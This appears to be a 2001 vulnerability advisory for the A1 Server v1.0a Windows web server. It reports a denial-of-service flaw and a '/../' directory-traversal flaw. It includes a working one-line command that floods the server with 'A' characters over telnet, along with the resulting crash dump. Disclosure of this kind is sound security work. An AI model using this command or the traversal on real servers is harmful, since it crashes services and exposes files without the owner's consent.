Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
Date: Mon Feb 26 2001 - 22:53:54 CST
A1 Server v1.0a is a HTTPd server for the Windows
OS, and it will deliver the following content: GIF
impages, HTM or HTML pages, EXE files, and ZIP
files. The server is very small, but yet somewhat
stable and is freeware! (Yeah. right)
The Vendors website is:
Problem #1 : Denial of Service Attack
A1 Server v1.0a is vulnerable to a nasty Denial of
Service attack where it can be flooded with useless
junk until the server crashes promptly. Once it has
been crashed it needs to be restarted again for it to
work properly. All windows versions apear to be
echo `perl -e 'print "A" x 1000'` | telnet a1server 80
^^ = Will cause the program to quit within seconds
A1SERVER caused an invalid page fault in module
A1SERVER.EXE at 016f:004101ae.
EAX=00000000 CS=016f EIP=004101ae
EFLGS=00010246 EBX=00420094 SS=0177
ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177
ESI=00000001 FS=6417 EDX=004263b2 ES=0177
EDI=00000001 GS=5e47 Bytes at CS:EIP:
f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
004211a8 0000001c 006bfca8 004151db 004211a8
00000001 006bfcb0 00008d20 006bfcfc bff7b796
bffc9490 00000177 006bfcb8 bff7b828 006bfcc8
Problem #2 : Directory Traversal
Adding the string "/../" to an URL allows an attacker to
view any file on the server provided you know where
the file is at in the first place.
^^ = Will obviously open the Scandisk.log fiel.
Vendor has been notified. No e-mail reply yet.
b10z HTTPd Advisory
Found: February 26th, 2001.